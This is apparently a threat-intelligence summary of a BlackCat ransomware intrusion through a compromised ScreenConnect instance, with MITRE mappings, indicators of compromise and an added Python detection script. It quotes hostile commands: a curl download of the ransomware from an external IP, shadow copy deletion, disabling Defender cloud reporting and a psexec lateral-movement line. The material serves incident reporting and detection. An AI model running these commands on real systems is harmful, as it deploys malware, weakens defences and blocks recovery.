BlackCat Ransomware Affiliate TTPs | Huntress

This page summarizes Huntress’s analysis of an ALPHV/BlackCat ransomware affiliate intrusion, focusing on a ScreenConnect compromise used to deploy BlackCat and move laterally while evading defenses. The report emphasizes the commands embedded in the RaaS payload to weaken security tooling and block recovery, and the need for accurate asset inventories and attack surface reduction to prevent similar intrusions through legitimate but exposed remote-access software. #BlackCat #ALPHV #ScreenConnect #RaaS #Huntress #CISA #FBI

Keypoints

  • The investigation centers on a ScreenConnect compromise that led to a BlackCat ransomware deployment on an endpoint in a healthcare-associated environment.
  • Two ScreenConnect instances were present on the endpoint: one appeared legitimate (version 23.9.8.8811) and the other was likely compromised (installed 2022-03-28) and served as the threat actor’s access path.
  • The attacker downloaded the ransomware executable from a remote host with curl and attempted to evade detection by turning off Windows Defender cloud (SpyNet/MAPS) reporting.
  • The ransomware executable carried embedded commands and credentials that let it move laterally across endpoints in the same infrastructure via remote execution tooling (e.g., psexec).
  • Observed network activity involved internal IP ranges (10.x.x.x and 192.168.x.x) and a dynamic DNS domain (REDACTED.ddns.net).
  • The incident underscores the importance of accurate asset inventories and a reduced attack surface, since initial access came through a legitimate but exposed remote-access application.

MITRE Techniques

  • [T1190] Exploit Public Facing Application – The threat actor accessed the endpoint via the second ScreenConnect instance. “The threat actor accessed the endpoint via the second identified ScreenConnect instance.”
  • [T1078.002] Valid Domain Accounts – A specific username connected to the ScreenConnect instance, indicating use of valid credentials. “shortly after the instance was installed on March 28, 2022, a specific username connected to the instance.”
  • [T1059.003] Windows Command Shell – The attacker executed commands from a Windows shell, including a direct download command. “The following command was executed: curl http://94.131.109[.]54:6531/iw0pjCKEzADKTMA5Xkv8ZxS6.exe -O”
  • [T1562.001] Disable/Modify Tools – Defender protections were weakened through a registry change: SpyNetReporting, which controls Defender’s Microsoft Active Protection Service (MAPS) cloud reporting, went from 2 (advanced) to 0 (off). “the Windows Defender SpyNetReporting value was changed from 2 to 0, essentially disabling the functionality.”
  • [T1490] Inhibit System Recovery – The ransomware run included shadow copy deletion (via vssadmin and WMI) and service control commands to hinder recovery. “vssadmin.exe Delete Shadows /all /quiet” and “wmic.exe Shadowcopy Delete”
  • [T1486] Data Encrypted For Impact – The ransomware encrypts data on the endpoint, and its payload carried the commands and credentials needed to spread the encryption to other hosts. “embedded commands and credentials that allowed the ransomware executable to move laterally”
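The commands quoted in the technique list are all visible in ordinary endpoint telemetry (process creation and registry-set events), so a detection engineer can turn them into rules directly. The block below is an added example written for this summary; it is not Huntress’s code and not part of the original report. The sample events are constructed to mirror the quoted commands using Sysmon event numbering (1 = process creation, 13 = registry value set); the hostnames, PsExec target, account and password are invented. Technique IDs follow the summary’s own mapping, except T1021.002 for the PsExec step, which MITRE assigns to PsExec-style admin-share execution and the summary describes without an ID. It generalizes slightly beyond the page by also matching wget/certutil/bitsadmin downloaders and the `reg add` form of the SpyNetReporting change.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One endpoint telemetry record, using Sysmon event numbering:
    1 = process creation, 13 = registry value set."""
    event_id: int
    host: str
    image: str = ""
    command_line: str = ""
    target_object: str = ""   # registry path (event 13 only)
    details: str = ""         # new value as Sysmon renders it (event 13 only)


# Constructed sample telemetry modelled on the commands quoted in the summary.
# Hosts, the PsExec target, the account and the password are invented.
SAMPLE_EVENTS = [
    Event(1, "ws01", r"C:\Windows\System32\curl.exe",
          "curl http://94.131.109.54:6531/iw0pjCKEzADKTMA5Xkv8ZxS6.exe -O"),
    Event(13, "ws01", r"C:\Windows\System32\reg.exe",
          target_object=r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\SpyNetReporting",
          details="DWORD (0x00000000)"),
    Event(1, "ws01", r"C:\Windows\System32\vssadmin.exe",
          "vssadmin.exe Delete Shadows /all /quiet"),
    Event(1, "ws01", r"C:\Windows\System32\wbem\wmic.exe", "wmic.exe Shadowcopy Delete"),
    Event(1, "ws01", r"C:\Temp\psexec.exe",
          r"psexec.exe \\10.0.0.25 -u CORP\svc_backup -p Passw0rd! -s -d cmd /c C:\Temp\payload.exe"),
    # Benign activity on a second host that must not fire.
    Event(1, "ws02", r"C:\Windows\System32\curl.exe", "curl https://example.com/readme.txt -O"),
    Event(1, "ws02", r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),
]

DOWNLOADER_RE = re.compile(r"\b(curl|wget|certutil|bitsadmin)(\.exe)?\b", re.I)
REMOTE_BINARY_RE = re.compile(r"https?://\S+\.(exe|dll|ps1)\b", re.I)
SHADOW_DELETE_RE = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)
SPYNET_CMD_RE = re.compile(r"SpyNetReporting\b.*?/d\s+0\b", re.I)   # reg add ... /d 0
PSEXEC_REMOTE_RE = re.compile(r"\b(psexec|paexec)(\.exe)?\s+\\\\", re.I)  # \\target
DWORD_RE = re.compile(r"DWORD\s*\(0x([0-9a-f]+)\)", re.I)


def dword_value(details):
    """Parse Sysmon's 'DWORD (0x00000000)' rendering into an int, or None."""
    m = DWORD_RE.search(details)
    return int(m.group(1), 16) if m else None


def rule_payload_download(ev):
    if ev.event_id == 1 and DOWNLOADER_RE.search(ev.command_line) \
            and REMOTE_BINARY_RE.search(ev.command_line):
        return "T1059.003", "command-line download of a remote executable"
    return None


def rule_defender_cloud_off(ev):
    # Registry write observed directly (event 13), or the same change made via reg.exe.
    if ev.event_id == 13 and ev.target_object.lower().endswith(r"\spynet\spynetreporting") \
            and dword_value(ev.details) == 0:
        return "T1562.001", "SpyNetReporting set to 0 (MAPS cloud reporting off)"
    if ev.event_id == 1 and SPYNET_CMD_RE.search(ev.command_line):
        return "T1562.001", "SpyNetReporting set to 0 via reg.exe"
    return None


def rule_shadow_copy_deletion(ev):
    if ev.event_id == 1 and SHADOW_DELETE_RE.search(ev.command_line):
        return "T1490", "volume shadow copies deleted"
    return None


def rule_psexec_remote(ev):
    # T1021.002 is MITRE's ID for PsExec-style admin-share execution (not in the summary's list).
    if ev.event_id == 1 and PSEXEC_REMOTE_RE.search(ev.command_line):
        return "T1021.002", "PsExec-style execution against a remote host"
    return None


RULES = [rule_payload_download, rule_defender_cloud_off,
         rule_shadow_copy_deletion, rule_psexec_remote]


def detect(events):
    """Return (host, technique_id, description) for every rule hit."""
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hits.append((ev.host, hit[0], hit[1]))
    return hits


def techniques_by_host(events):
    out = {}
    for host, tech, _ in detect(events):
        out.setdefault(host, set()).add(tech)
    return out


def hosts_with_chain(events, min_techniques=3):
    """Hosts showing several distinct stages of the chain. This is a far stronger
    signal than any single rule, which on its own may be routine admin activity."""
    return sorted(h for h, t in techniques_by_host(events).items() if len(t) >= min_techniques)


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
    print("chain hosts:", hosts_with_chain(SAMPLE_EVENTS))
```

The per-rule hits are deliberately kept separate from the chain score: `vssadmin list shadows` or a curl of a text file on ws02 produces nothing, while ws01 trips four distinct techniques, which is the pattern worth paging on.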

Indicators of Compromise

  • [IP Address] – 94.131.109.54:6531 (download source) and internal endpoints – 10.x.x.x, 192.168.x.x
  • [Domain] – REDACTED.ddns.net
  • [File] – iw0pjCKEzADKTMA5Xkv8ZxS6.exe, C:\Windows\System32\iw0pjCKEzADKTMA5Xkv8ZxS6.exe
  • [File] – curl.exe, and 2 more (used for the payload download and remote commands), fetching from 94.131.109.54:6531

Read more: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps